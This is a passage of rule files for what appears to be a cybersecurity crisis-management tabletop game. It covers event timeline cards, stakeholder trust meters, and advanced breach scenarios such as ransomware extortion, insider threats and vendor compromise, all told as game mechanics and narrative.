EVENT-02 Regulatory 72h Deadline Scheduled Turn 6 (deadline Turn 8) -10 Regulator/turn while un-notified; never = -20 Rep
EVENT-12 Government Subpoena Scheduled Turn 7 (med/large) Budget -5, Exec -10, Investigation +5%
EVENT-05 Class Action Triggered Customers un-notified after T5 or trust <20% Cust -15, Board -10, -10 Rep
EVENT-06 Regulatory Fine Triggered Regulator trust <20% Budget -10, Board -10, -10 Rep
EVENT-07 Media Frenzy Triggered Media <20% or silent through T3 Media -20, Cust -15, Board -10
EVENT-08 Second Breach Triggered T6: Remediation <30%, no rebuild +2 turns (once), Inv -30%, trust hits, -10 Rep
EVENT-10 Competitor Advantage Triggered Customer trust <40% from T5 Cust -10, Budget -5
EVENT-11 Executive Resignation Triggered Executive trust <30% Exec -10, Board -10, no Justification bonus

Deadline Summary (v2.2 — the only clock)

Deadline Turn If missed
Internal legal/executive escalation End of Turn 2 Narrative only (relabeled from the old "12-hour regulatory deadline" — the regulatory anchor is GDPR 72h)
Customer notification (ACTION-09) recommended End of Turn 5 Customer trust -10/turn; EVENT-05 may trigger; never notified = -15 Reputation at scoring
Ransom decision (ACTION-13) Start of Turn 5 (default; +2 turns if NEGOTIATE) Treated as REFUSE; data-publication event fires
Regulatory notification (ACTION-10) End of Turn 8 (escalating from Turn 6) Regulator trust -10/turn from Turn 6; never notified = -20 Reputation at scoring

Former "30-day"/"60-day" deadlines from v2.1 are re-expressed as the deferred final-scoring consequences above — they no longer exist as separate timers.


Turn Sequence with Events (reference)

Standard 8-Turn Disaster Recovery Game:

Turn Scheduled Event Typical Focus
1 Investigate, contain
2 First Media Coverage Investigation, media prep
3 Board Meeting Board briefed, regulators notified early
4 Remediation
5 Customer Notification Window + Shareholder Pressure Customer notification, ransom decision
6 Regulatory 72h Deadline (escalation begins) Regulators notified (if not already), remediation
7 Government Subpoena Final remediation, communication
8 — (game ends at +72h) Wrap-up actions, final scoring

Gameplay Strategy

Early Game (Turns 1-3)

Mid Game (Turns 4-6)

Late Game (Turns 7-8)


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by event kind:
  3. Blue (Scheduled): EVENT-01, EVENT-02, EVENT-03, EVENT-04, EVENT-09, EVENT-12
  4. Orange (Triggered): EVENT-05, EVENT-06, EVENT-07, EVENT-08, EVENT-10, EVENT-11
  5. Print the scheduled turn (or trigger condition) prominently on each card
  6. Include consequences clearly
  7. Cut along dotted lines
  8. Event timeline mat: see print pack (coming)

Disaster Recovery Module: Event Timeline Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/disaster-recovery/core-deck/stakeholder-cards.md

Disaster Recovery Module: Stakeholder Cards

Version: 2.2 - Playtest Edition Last Updated: October 2025


Overview

Stakeholder Cards represent the key groups affected by a data breach. Each stakeholder has a trust/satisfaction level (0-100%) that changes based on team actions. Stakeholders can escalate if not managed (triggering Events and budget costs).

Trust Thresholds & Loss (v2.2 — the ONE authoritative rule)

All older thresholds ("<30% trust = loss", "keep above 30/40/50 to win") are removed in v2.2.


Stakeholder Cards

STAKE-01: Customers

Stakeholder Type: External Primary Concern: Data privacy and service availability Trust Meter: Starts at 50% Decay (v2.2): From Turn 3 onward, if the team has completed no Communication-category action (the free Holding Statement counts), Customer trust -10 at the start of each turn. This does not stack with the Turn-5 notification penalty (EVENT-03) — apply one, not both, per turn. Below 20% = CRITICAL warning state (may trigger EVENT-05).

Description: The customers whose data was breached. They want to know: - What data was accessed - Whether it was encrypted - What they should do (change password, watch credit) - Whether the company is protecting them - Whether to switch providers

Behavior: - High Trust (70%+): Continue using service, minor PR impact - Medium Trust (40-70%): Some customer loss, but company is "handling it" - Low Trust (<40%): Customer exodus, lawsuits, regulatory investigation - Critical (<20%): Mass churn, bankruptcy risk, acquisition/collapse

What Affects Trust: - Increases Trust: - Customer Notification (ACTION-09): +15% - Public statement about patch/fix: +5% - Free credit monitoring offer: +10% - Quick response time: +5% per turn if investigating

Goal: - Ideally maintain above 50% for a positive outcome (trust feeds the final Reputation computation)

Loss (v2.2 single rule): - Customer trust at 0% = company collapses (immediate loss) - Narrative: mass churn, lawsuits, bankruptcy/acquisition

Crisis Actions That Help: - ACTION-09 (Customer Notification): +15% trust - ACTION-11 (Media Management): +10% trust - Any remediation action that shows progress: +2-5%

Special Events: - If trust drops too low, class action lawsuit filed (see Event Cards) - If trust stays high, customer retention and recovery possible - Media coverage affects customer trust (see Stakeholder: Media)


STAKE-02: Regulators

Stakeholder Type: Government/Legal Primary Concern: Compliance with breach notification laws Trust Meter: Starts at 60% Escalation (v2.2): If ACTION-10 is not completed, Regulator trust -10 at the start of each turn from Turn 6 (see EVENT-02). Below 20% = CRITICAL warning state (triggers EVENT-06 Regulatory Fine).

Description: Government agencies that regulate data privacy: - State attorneys general (breach notification laws) - Federal regulators (healthcare, financial, etc.) - International regulators (GDPR if any EU customers) - Law enforcement (FBI, Secret Service)

Behavior: - High Confidence (70%+): Voluntary cooperation, no penalties - Medium Confidence (40-70%): Investigation, possible fines - Low Confidence (<40%): Aggressive investigation, significant fines - Critical (<20%): Criminal prosecution, company shut down

What Affects Regulatory Confidence: - Increases Confidence: - Regulatory Notification (ACTION-10): +20% - Prompt customer notification: +10% - Third-party incident response (ACTION-04): +15% - Forensics evidence: +10% - Proactive remediation: +5%

Regulatory Requirements Vary (real-world flavor; the in-game clock is GDPR 72h = end of Turn 8): - GDPR (EU): Notify supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER - California: Notify without unreasonable delay; CCPA statutory damages fuel class actions - HIPAA: Notification within 60 days (healthcare) - Sector-Specific: Finance, healthcare have stricter rules

Goal: - Maintain regulatory confidence above 50% - Comply with the Turn-8 notification requirement

Loss (v2.2 single rule): - Regulator trust at 0% = company collapses (immediate loss) - Narrative: crippling fines, criminal prosecution, license revoked

Crisis Actions That Help: - ACTION-10 (Regulatory Notification): +20% confidence - ACTION-04 (Third-party IR): +15% confidence - ACTION-05, ACTION-07 (Remediation): +5-10%

Special Events: - If notification deadline missed: Regulatory Penalty Event - If confidence drops too low: Fine Assessment Event - If properly handled: Regulatory Cooperation Event (reduced penalties)


STAKE-03: Media / Public

Stakeholder Type: External / Communication Primary Concern: Newsworthy story (bigger = bigger problem) Trust Meter: Starts at 40% (media is naturally skeptical) Escalation: Escalates based on company response quality

Description: Media outlets, journalists, bloggers, social media. Media decides whether breach is: - Small tech story (1 article) - Major business news (multiple outlets, days) - National news (major outlets, weeks) - International scandal (global coverage)

Behavior: - Positive Coverage (70%+): "Company handled breach well", trust maintained - Neutral Coverage (40-70%): Matter-of-fact reporting, some concern - Negative Coverage (<40%): "Company slow to respond", "Cover-up suspected" - Scandal (<20%): Major negative coverage, "Company failed customers"

What Affects Media Coverage: - Positive Factors: - Proactive media statement (ACTION-11): +20% - Quick notification (customers notified by end of Turn 5): +15% - CEO takes responsibility: +10% - Transparent communication: +10% - Third-party validation: +5%

Media Impact on Business: - Positive media → customers stay, suppliers trust company - Negative media → customers leave, stock price drops, suppliers question - Scandal media → business collapse possible, bankruptcy risk

Goal: - Maintain media trust above 40% - Frame narrative as "company handled responsibly" - Minimize negative coverage (below 20% = CRITICAL warning; triggers EVENT-07)

Loss (v2.2 single rule): - Media trust at 0% = company collapses (immediate loss) - Narrative: negligence narrative sticks, stock crash, consumer boycott

Crisis Actions That Help: - ACTION-11 (Media Management): +20% coverage - ACTION-09 (Customer Notification): +5% (transparency) - ACTION-12 (Board Communication): +5% (if credible)

Special Events: - If company is silent: "Media Frenzy" Event (increased coverage) - If company responds well: "Positive Coverage" Event (mitigates damage) - If executives hide: "Cover-up Narrative" Event (major damage)


STAKE-04: Board of Directors

Stakeholder Type: Internal / Governance Primary Concern: Company liability and fiduciary duty Trust Meter: Starts at 70% (board is inherently supportive initially) Escalation: Drops if response is inadequate; may fire CEO

Description: Board of directors (and C-level executives if private company). Board must: - Fulfill fiduciary duty to shareholders - Authorize major spending (crisis response can be very expensive) - Decide on disclosure (SEC rules if public) - Decide on executives' future (fire/retain CEO) - Manage shareholder relationships

Behavior: - High Confidence (70%+): Board is supportive, authorizes spending, defends executives - Medium Confidence (40-70%): Board is questioning, scrutinizes spending, considers changes - Low Confidence (<40%): Board is critical, may fire CEO, considers restructuring - Critical (<20%): Board votes to remove management, sell company, or file bankruptcy

What Affects Board Confidence: - Increases Confidence: - Board Notification (ACTION-12): +20% - Professional incident response: +15% - Quick containment: +10% - Good regulatory relationship: +10% - Transparent communication: +5%

Board Decision Points (v2.2 clock): - Turn 3: Board Meeting (EVENT-04; ACTION-12 should be done before it) - Board decides if CEO retains confidence - Major spending approvals (forensics, lawyers, PR) - Disclosure decisions

Goal: - Maintain board confidence above 50% - Board authorizes necessary spending - Executives retain their positions (below 20% = CRITICAL warning state)

Loss (v2.2 single rule): - Board trust at 0% = company collapses (immediate loss) - Narrative: CEO fired, forced sale, bankruptcy filing

Crisis Actions That Help: - ACTION-12 (Board Notification): +20% confidence - ACTION-04 (Third-party IR): +15% (shows professional response) - ACTION-01, ACTION-07 (Forensics/Rebuild): +5-10%

Special Events: - Turn 3: Board Meeting Event (first assessment) - If confidence drops low: "CEO Removed" Event (new CEO, game becomes harder) - If well-managed: "Board Confidence Maintained" Event (positive modifier)


STAKE-05: Executive Leadership

Stakeholder Type: Internal / Management Primary Concern: Job security and company survival Trust Meter: Starts at 80% (executives are naturally supportive initially) Escalation: Drops if response is chaotic; may resign or sabotage

Description: C-level executives (CEO, CTO, CFO, CISO, General Counsel) who must: - Make critical decisions under pressure - Coordinate crisis response - Handle media inquiries - Present to board - Ensure company continues operating - Manage their own careers/reputations

Behavior: - High Morale (70%+): Executives are focused, coordinated, decisive - Medium Morale (40-70%): Executives are stressed, some disagreements, slower decisions - Low Morale (<40%): Executives may resign, infighting, poor decisions - Critical (<20%): Executive exodus, chaos, no leadership

What Affects Executive Morale: - Increases Morale: - Clear incident response plan: +15% - Professional guidance (consultants): +10% - Regular communication/updates: +5% per turn - Board support: +10% - Progress on containment: +5%

Executive Departures Risk: - If morale drops too low, key executives resign - Each resignation removes their expertise from future decisions - Replacement executives are less effective initially - Crisis becomes harder to manage

Goal: - Maintain executive morale above 50% - Prevent key executive resignations (below 30% triggers EVENT-11; below 20% = CRITICAL warning state) - While Executive trust is below 30%, the Justification bonus is unavailable (see EVENT-11)

Loss (v2.2 single rule): - Executive trust at 0% = company collapses (immediate loss) - Narrative: executive exodus, leadership vacuum, chaos

Crisis Actions That Help: - Regular communication: +5% per turn - Professional response team: +10% - Regulatory/customer progress: +5% - Board confidence: +10%

Special Events: - If morale drops low: "Executive Resignation" Event (key person leaves) - If morale stays high: "Leadership United" Event (positive coordination bonus) - Media attacks on executives: Morale drop (-10%)


Stakeholder Summary

Stakeholder Type Start Trust Critical Warning Primary Actions
Customers External 50% <20% ACTION-09 (notify), ACTION-11 (PR)
Regulators Government 60% <20% ACTION-10 (notify), ACTION-01/04 (forensics)
Media External 40% <20% ACTION-11 (PR), ACTION-09 (transparency)
Board Internal 70% <20% ACTION-12 (notify), ACTION-04 (guidance)
Executives Internal 80% <20% (resignations from <30%) Regular communication, success indicators

Reminder (v2.2): critical is a warning state only. The single loss condition is any trust meter at 0%. Meters clamp to 0-100%.


Gameplay Strategy

Multi-Stakeholder Management

Teams must balance managing five competing stakeholder groups:

Prioritization Strategy 1: External First - Focus on Customers and Media - Maintain public trust - Regulators will follow - Risk: Internal management gets neglected

Prioritization Strategy 2: Internal First - Focus on Board and Executives - Maintain leadership confidence - Internal team makes better decisions - Risk: External stakeholders (customers, media) get neglected

Prioritization Strategy 3: Balanced - Do some actions for each stakeholder group - Distribute budget across all notifications - More complex but sustainable - Risk: Medium progress on all, complete on none

Prioritization Strategy 4: Targeted - Identify critical stakeholder (maybe regulators) - Focus budget there - Neglect others - Risk: Single stakeholder collapse

Stakeholder Interactions

Stakeholders influence each other: - Media → Customers: If media says "company hid breach", customers distrust (stack penalties) - Regulators → Customers: If regulator fines company, customers see company as unsafe - Board → Executives: If board removes CEO, executives lose confidence - Executives → Board: If executives resign, board loses confidence in response - Customers → Stock Price: If customer trust drops, stock price drops (affects Board decisions)


Escalation Mechanics

Each stakeholder's escalation matches a Triggered Event (see Event Cards — those are the authoritative conditions):

Customers Escalate If:

Regulators Escalate If:

Media Escalates If:

Board Escalates If:

Executives Escalate If:


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by stakeholder type:
  3. Blue (External): STAKE-01 (Customers), STAKE-03 (Media)
  4. Red (Internal): STAKE-04 (Board), STAKE-05 (Executives)
  5. Purple (Government): STAKE-02 (Regulators)
  6. Include trust meter on each card (0-100% indicator)
  7. Include escalation triggers
  8. Cut along dotted lines
  9. Stakeholder tracker sheet: see print pack (coming)

Disaster Recovery Module: Stakeholder Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/disaster-recovery/expansion-deck/advanced-scenarios.md

Disaster Recovery Module: Advanced Crisis Scenarios (Expansion)

Version: 2.2 - Playtest Edition Last Updated: October 2025


Overview

Advanced Scenario Cards extend the Disaster Recovery module with sophisticated, multi-faceted crisis situations that challenge experienced crisis management teams.

How scenarios work (v2.2): each scenario is played with the standard core rules — same 8-turn clock, same Action/Event/Stakeholder cards, same scoring. A scenario adds its "Special Events" as extra Scheduled events on the timeline at setup, and applies its concrete Difficulty (v2.2) effects (listed per scenario, replacing the old percentage "difficulty multipliers"). The only mechanical layers are the Special Events and the Difficulty block; "Cost Implications" sections are narrative color for the debrief. Dollar figures are narrative-only unless converted at 1 Budget ≈ $50K.


Advanced Crisis Scenarios

SCENARIO-01: Multi-Region Breach with Data Sovereignty Issues

Complexity: ADVANCED Affected Regions: US + EU + Asia Primary Challenge: Different legal requirements for different regions

Description: Breach affects customer data in multiple countries with different privacy laws: - US (California): notify without unreasonable delay; CCPA statutory damages fuel class actions - EU (GDPR): 72-hour notification deadline; fines up to €20M or 4% of global turnover, whichever is HIGHER - Asia (varies): Different deadlines and requirements in each country

Data residency requirements mean: - EU customer data cannot be transferred to US servers - Forensics must happen in country where data is stored - Different regulators in each country demand investigation - Different notification laws require different messages

Key Complications: - Timeline Conflict: EU regulators demand notification faster than the domestic clock; US requires notification without unreasonable delay; Asia varies - Legal Conflict: EU GDPR vs. US lawful intercept (conflicting requirements) - Investigation: Must conduct forensics in multiple jurisdictions simultaneously - Costs: Multi-region response = much higher costs

Team Decision Points: 1. Which region to prioritize (cannot satisfy all simultaneously) 2. How to conduct forensics across jurisdictions 3. How to notify customers differently per region 4. How to handle conflicting regulatory requirements

Special Events (added to the timeline at setup): - Turn 2: EU regulators demand notification — a second ACTION-10 play (EU filing) is due by end of Turn 4 - Turn 5: International regulators demand investigation coordination (Regulator trust -5 if Investigation is below 25%) - Turn 6: Data residency complication — if the EU filing was missed, Regulator trust -10 per turn (in place of, not stacked with, the core EVENT-02 escalation)

Cost Implications: - Multi-region legal and forensics overhead: see Difficulty below - Regulatory fines can stack across jurisdictions (narrative-only) - Notification costs: translations, different templates, regulatory filings

Team Response: - Must prioritize regions (satisfy EU first due to timeline) - Must engage local lawyers in each jurisdiction - Must conduct compliant investigation (following local laws) - Communication % must advance faster than usual

Difficulty (v2.2): - All Communication advances -5% (multi-jurisdiction overhead; minimum +5%) - A second regulator notification (EU) is required by end of Turn 4 (ACTION-10 played twice this game) - Set aside 5 Budget at setup as a translation/filing reserve (unavailable for actions)


SCENARIO-02: Ransomware with Extortion Threat

Complexity: ADVANCED Attacker Demand: $10M ransom or threaten to sell/publish data Primary Challenge: Responding to extortion threats

Description: Attacker not only encrypted data but also stole data and threatens public disclosure: - "Pay up or we publish 50GB of customer PII on dark web" (demand ≈ 20 Budget; narrative "$10M" for a large enterprise) - Attacker provides proof of data access (sample files) - Extortion email sent to CEO and board - Attacker sets the deadline at the start of Turn 5 (the core ACTION-13 ransom deadline)

Key Complications: - Payment Question: Pay ransom or not? - Paying: Funding criminal enterprise, no guarantee of data deletion - Not paying: Risk of data publication (massive PR disaster) - Disclosure Dilemma: Tell customers about extortion threat? - Yes: Customers fear data will be published - No: If data is published, looks like cover-up - Law Enforcement: FBI recommends not paying (incentivizes more attacks) - Backup Reliance: Can you recover without paying?

Timeline Pressure (Special Events added at setup): - Turn 1: Extortion email; ransom deadline set at start of Turn 5 - Turn 2: First partial data publication (attacker shows they have data): Media trust -5 - Turn 3: Attacker lowers price (negotiation attempt; pure roleplay — ACTION-13 costs are unchanged) - Turn 5: Deadline reached — resolve ACTION-13 as printed (publish if unpaid; +2 turns if NEGOTIATE)

Financial Dilemma: - Ransom: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage - Recovery from backup: Slow (if backups exist) - Data publication: Regulatory fines + lawsuits (potentially $50M+ liability; narrative-only) - Public disclosure: Stock price crash, customer loss

Team Decisions: 1. Pay ransom? (Risk: Encourages future attacks, no guarantee) 2. Attempt to recover from backup? (Risk: Slow recovery, data loss) 3. Notify customers before/after data publication? (Risk: Either way is bad) 4. Notify regulators? (Required, but shows full extent of damage)

Law Enforcement Engagement: - FBI may take over investigation (federal crime) - Reduces team's control of situation - May recommend decoy ransom negotiation (catch attacker) - Investigation may take weeks (slow response)

Special Events (added to the timeline at setup): - Turn 3: Media discovers extortion threat ("CEO held for ransom"): Media trust -10 - Turn 4: Attacker releases more sample data: Customer trust -5

Cost Implications: - Ransom: 20 Budget if paid (ACTION-13 PAY, as printed) - FBI coordination and extortion-specific notification overhead: see Difficulty below - Regulatory fines if data published: narrative-only (GDPR-scale)

Difficulty (v2.2): - Remediation advances are halved until ACTION-13 is declared (operational paralysis while the decision hangs) - Use ACTION-13 exactly as printed; the ransom deadline is start of Turn 5


SCENARIO-03: Supply Chain Compromise (Vendor Breach Affects Customers)

Complexity: ADVANCED Vector: Breach compromises customers' data at YOUR company's data store Primary Challenge: Managing responsibility for vendor compromise

Description: Investigation reveals attacker didn't target your company directly—they compromised a vendor you use: - Your company uses cloud storage vendor (e.g., competitor to AWS) - That vendor was breached - Attacker gained access to YOUR customer data stored at vendor - Question: Who is responsible? You? Vendor? Both?

Key Complications: - Liability Question: - You're liable to customers (you selected vendor) - Vendor is liable (their security failure) - Customers might sue both - Vendor Response: - Vendor may be uncooperative (deny liability) - Vendor may be bankrupt (vendor company collapse during breach) - Vendor may not investigate properly - Notification Question: - Tell customers you chose bad vendor? - Or just notify about data breach without explaining vendor? - Either way looks bad - Investigation: - Must investigate vendor (not your own systems) - Vendor may not cooperate - Limited forensic access (you don't control vendor systems) - Regulatory agencies may blame you anyway

Responsibility & Liability: - Customer lawsuits: "You failed to vet vendor properly" - Regulatory fines: "You failed to oversee third-party risk" - Vendor lawsuits: "Vendor refuses to pay damages" - Vendor bankruptcy: "Vendor can't pay, customers turn to you"

Team Decisions: 1. Blame vendor (legally risky, looks bad) 2. Share responsibility (legally safer, but costs more) 3. Quickly terminate vendor relationship (looks reactive) 4. Demand vendor pay for notification/remediation (vendor may refuse)

Special Events: - Turn 1: Discovery that vendor was breached - Turn 2: Vendor denies liability / claims it's your responsibility - Turn 3: Regulatory agency demands to know vendor details - Turn 4: First customer lawsuit against both you AND vendor - Turn 5: Vendor declares bankruptcy (can't pay damages)

Cost Implications: - Investigation into vendor: +8 Budget (forensics at vendor site) - Legal: +20 Budget (defending against liability claims) - Regulatory fines: Potentially full amount (you're still liable) - Customer lawsuits: Likely regardless of vendor's role - Vendor transition: +15 Budget (switch to new vendor, migrate data)

Communication Challenge: - Customers angry at you (you chose bad vendor) - Media: "Company failed to vet third-party security" - Regulatory: "Poor third-party risk management" - Board: "Why did we use this vendor?"

Difficulty (v2.2): - Investigation advances -5% (no direct access to vendor systems; minimum +5%) - Set aside 10 Budget at setup as a legal reserve (unavailable for actions) - Turn-5 Special Event: vendor declares bankruptcy — Board trust -10


SCENARIO-04: Insider Threat Revealed Mid-Crisis

Complexity: ADVANCED Attacker: Current employee, not external hacker Primary Challenge: Organizational trauma and trust collapse

Description: During investigation of external breach, forensic team discovers: - The "external breach" had help from insider - Employee provided attacker with access/credentials - Employee may have also exfiltrated data - Employee is still working at company (not yet caught)

Key Complications: - Who is involved? - Single rogue employee? - Conspiracy (multiple employees)? - Which departments are involved? - Motive: - Disgruntled employee selling data - Corporate espionage (hired by competitor) - Theft for personal gain - Political/ideological motivation - Scope: - What other systems did insider compromise? - What data did they access/steal? - How long were they active? - Are there other insiders? - HR/Legal: - Fire the employee immediately (risks legal action) - Continue employment while investigating (ethics question) - Involve law enforcement (police investigation) - Civil litigation from employee (wrongful termination claims)

Organizational Impact: - Trust in employees collapses - Morale plummets (people suspect each other) - Staff paranoia increases - Executive distraction (investigating insider)

Special Events: - Turn 2: Forensics discovers insider involvement - Turn 3: HR/Legal team must decide: fire or investigate? - Turn 4: If fired, wrongful termination lawsuit likely - Turn 4: If not fired, employee may destroy more evidence - Turn 5: Law enforcement investigation (if reported to police)

Team Decisions: 1. Immediately fire employee (legal risk but stops damage) 2. Continue employment while investigating (ethical but risky) 3. Involve law enforcement (criminal investigation, slow) 4. Settle potential lawsuits preemptively (expensive)

Investigation Complexity: - Cannot trust employee's explanations - Must verify what employee had access to - Must recover deleted data/logs - Must interview other employees - Investigation takes much longer (suspicious of everyone)

Cost Implications: - Extended forensics: +15 Budget (investigating employee) - Legal: +25 Budget (employment law, potential settlements) - HR investigation: +8 Budget (interview staff, background checks) - Remediation: +20 Budget (credential reset, system rebuild) - Potential lawsuit: Millions if significant

Communication Challenge: - Cannot publicly disclose insider involvement (defamation risk) - Regulators and customers demand explanation - Media: "Company had insider threat" - Board: "Why was security so bad?"

Difficulty (v2.2): - Investigation advances are halved until Investigation reaches 50% (internal accounts cannot be trusted) - Executive trust starts at 60% (instead of 80%) - ACTION-08 (Credential Reset) is effectively mandatory — if not completed by end of Turn 6, EVENT-08 (Second Breach) fires automatically


SCENARIO-05: Critical Infrastructure Breach (Safety/Lives at Risk)

Complexity: ADVANCED+ Sector: Utilities, Healthcare, Transportation, Manufacturing Primary Challenge: Physical safety takes priority over cybersecurity response

Description: Breach affects critical infrastructure where compromise could cause physical harm: - Healthcare: Hospital network compromise during surgery (patient safety risk) - Utilities: Power grid compromise during storm (people without power/heat) - Transportation: Traffic system compromise (accidents possible) - Manufacturing: Production system compromise (equipment failure)

Key Complication: Safety > Security - Cannot shut down system for forensics if people are harmed - Cannot remediate if it requires system downtime - Incident response must preserve operational safety - Balances security investigation with operational continuity

Regulatory Escalation: - CISA (Cybersecurity Infrastructure Security Agency) involved immediately - National Incident Command System (NICS) may take over - Government mandates response (not optional) - Military/intelligence agencies may be involved - Cannot investigate without government approval

Special Considerations: - Lives are at stake (not just data) - Response priorities are: Safety → Containment → Investigation - Traditional forensics may be impossible (system must stay operational) - Attacker knows system is critical (leverage for negotiation)

Special Events: - Turn 1: CISA declaration of critical infrastructure incident - Turn 2: Government takes partial control of response (may override company decisions) - Turn 3-4: Attacker threatens system shutdown (extortion using safety risk) - Turn 5: Coordinated media/government briefings (national security implications)

Team Decisions: 1. Continue operations (risk of safety incident) or shut down (risk to people without service)? 2. Engage with government agencies (lose control of response) 3. Negotiate with attacker (payment may violate OFAC sanctions if the actor is sanctioned; government will weigh in) 4. Accept potential service interruption (for safety)

Cost Implications: - Immediate government response: +50 Budget (federal agencies) - Operational impact: Unknown (depends on what breaks) - Remediation: Cannot shut down system (very limited options) - Investigation: Deferred (safety is priority) - National security classification: Investigation may be classified (cannot discuss publicly)

Communication Challenge: - Cannot disclose security details (national security) - Cannot disclose full scope (might encourage copycat attacks) - Public panic risk (if people know infrastructure is vulnerable) - Media cannot report full details (government requests)

Difficulty (v2.2): - Remediation advances are halved (systems must stay operational — no downtime allowed) - Communication advances -5% (national security disclosure restrictions; minimum +5%) - ACTION-13 PAY is unavailable (government prohibits payment) - Turn-1 Special Event: CISA declaration — Regulator trust starts at 50% but ACTION-10 gives +25 instead of +20 (cooperation is rewarded)


SCENARIO-06: Stock Price Crash (Public Company Panic)

Complexity: ADVANCED Trigger: Negative media coverage + analyst downgrades Primary Challenge: Managing financial crisis alongside security crisis

Description: Public company stock price crashes following breach announcement: - News of breach announced - Stock drops 10-20% in first day - Short-sellers amplify negative sentiment - Analysts downgrade stock rating - Institutional investors sell (panic selling) - Stock drops 30-50% or more

Key Complications: - Financial Crisis: - Company loses market value ($1B+ in some cases) - Credit rating downgrade possible - Difficulty accessing credit markets - Acquisition at depressed price possible - Board/Shareholder Panic: - Shareholders demand CEO removal - Board may fire executives immediately - Board may accept lowball acquisition offer - Media coverage of internal turmoil - Business Disruption: - Employee morale crashes (stock is part of compensation) - Key employees leave (seeking more stable companies) - Customer confidence drops - Supplier payment delays (credit rating issue) - Business slows due to loss of employee focus

Investor Psychology: - Fear-driven selling (stock is "falling knife") - Rumors spread (company is bankruptcy risk) - Technical traders amplify selling (algorithmic trading) - Recovery takes months/years even if breach is minor

Special Events: - Turn 1: Stock drops 20% (breach announcement) - Turn 2: Analyst downgrades (stock drops another 15%) - Turn 3: Media "Death Spiral" narrative ("Company Doomed") - Turn 4: Short-seller report (negative narrative amplified) - Turn 5: Activist investor demands board change - Turn 6: Acquisition offer from vulture investor (lowball) - Turn 7: Board may accept acquisition (loses independence)

Team Decisions: 1. Focus on crisis response (stock takes care of itself) 2. Spend effort on investor relations (PR effort) 3. Respond to activist pressure (appeasement or defiance?) 4. Accept acquisition offer or fight it?

Indirect Crisis Complications: - Cannot spend freely on response (stock-based credit) - May need to cut crisis response budget (unexpected) - Board becomes distracted (shareholder meetings, hostile negotiations) - Executives leave (job market is competitive) - Crisis response effectiveness drops

Cost Implications: - Investor relations campaign: +10 Budget - Board/shareholder meetings: Distraction (-10 effectiveness) - Potential acquisition: Loss of independence - Employee departures: Loss of key expertise - Credit access: May be restricted (raises costs)

Communication Challenge: - Must manage investor narrative (balance hope + realism) - Must appear competent (or stock collapses more) - Media attention is intense (every statement scrutinized) - Cannot show weakness (stock market punishes)

Difficulty (v2.2): - Board trust starts at 50% (instead of 70%) - Budget -10 at setup (credit crunch) - EVENT-09 (Shareholder Pressure) fires at Turn 3 AND Turn 5 (it is scheduled twice this game)


SCENARIO-07: Ransomware + Data Breach + Business Email Compromise

Complexity: ADVANCED+ Multiple Simultaneous Compromises: Systems encrypted + data stolen + email account compromised Primary Challenge: Responding to multiple attack objectives simultaneously

Description: Not a single attack but multiple overlapping compromises: 1. Ransomware: File servers encrypted (production stops, cannot access files) 2. Data Breach: Database stolen (customer data exfiltrated) 3. Email Compromise: CEO's email account compromised (attacker can send as CEO)

Key Complications: - Attacker has multiple leverage points: - "Pay ransom or systems stay encrypted" (operational pressure) - "Pay to prevent data publication" (financial/reputational pressure) - "Stop responding or we'll send fake CEO email" (social engineering pressure) - Investigation difficulty: - Multiple attack vectors to investigate - May be different attackers or coordinated campaign - Each compromise has different timeline - Cannot determine if attacks are related or independent - Remediation priorities clash: - Decrypt systems immediately (get operations back) - Recover stolen data (prevent publication) - Secure CEO email account (prevent further compromise) - Cannot do all three at once (budget/time constraints)

Special Complications: - Fake CEO Email Risk: - Attacker sends email as CEO - "Approves" emergency spending - "Authorizes" data transfers - "Orders" employee actions - Teams cannot tell if email is real - Timeline Acceleration: - Email compromise creates urgency - Attacker can impersonate executives - Must immediately notify all employees - Breach of trust (employees distrust CEO emails)

Special Events: - Turn 1: Discovery of ransomware + data breach - Turn 2: Discovery of CEO email compromise - Turn 3: Fake CEO email sends "emergency transfer" (employees confused) - Turn 4: Attacker threatens to send more fake emails (escalation) - Turn 5: Ransom deadline, data publication deadline, email account deadline (all converging)

Investigation Complexity: - Three separate forensics investigations (expensive) - Each compromise requires different approach - Timelines may overlap (more complexity) - May be related (same attacker) or unrelated (unlucky)

Cost Implications: - Triple forensics: +20 Budget (investigating all three) - Triple ransom/extortion demands: $10M+ total - Remediation: +25 Budget (rebuild files, backup, email security) - Communication: +15 Budget (notifying employees about fake emails) - Regulatory fines: Stacked (multiple breach types)

Team Decisions: 1. Which compromise to prioritize? (Cannot fix all simultaneously) 2. Pay multiple ransoms or negotiate single amount? 3. How to prevent fake CEO emails during investigation? 4. How to rebuild trust after email compromise?

Communication Challenge: - Must warn employees about fake emails (careful wording) - Cannot fully disclose CEO email compromise (executive embarrassment) - Must appear to have control (or stock crashes) - Media narrative: "Multiple breaches mean security is very bad"

Difficulty (v2.2): - +2 turns of events: EVENT-08 (Second Breach) is pre-armed and fires automatically at Turn 6 (once) — the game runs 10 turns - All track advances -5% (three simultaneous investigations; minimum +5%) - The ransom deadline covers all three extortion threats — one ACTION-13 decision resolves them together


SCENARIO-08: Breach During Merger/Acquisition (Regulatory + Deal Complications)

Complexity: ADVANCED+ Context: Breach happens while company is being acquired or merging Primary Challenge: Managing breach while deal dynamics change

Description: Breach is discovered during critical phase of M&A transaction: - Company announced acquisition/merger - Deal close in 30-45 days - Due diligence is underway (acquirer evaluating company) - Breach discovered mid-deal - Acquirer may walk away (reduces deal value or terminates) - Regulators may block deal (antitrust, security concerns)

Key Complications: - Deal Dynamics: - Acquirer discovers breach during due diligence - Acquirer may lower offer price (leverage) - Acquirer may demand warranty/escrow (financial penalty) - Deal may fail entirely (destroys shareholder value) - Information Control: - Acquirer has limited information (still under NDA) - Seller has incentive to minimize breach - Acquirer has incentive to maximize perceived severity - Buyer/seller information asymmetry complicates response - Regulatory Issues: - Merger may be blocked for security concerns - FTC may demand security improvements (delay deal) - State regulators may oppose merger (security risk) - Deal timing already tight (additional scrutiny delays close) - Board Pressure: - Board wants to preserve deal value - May demand minimal response (to not disclose full scope) - May pressure executives to downplay breach - Creates pressure for inadequate response

Timeline Pressure: - Deal must close in 30-45 days - Breach response takes time - Regulatory review adds time - Conflicting priorities: Deal vs. Response

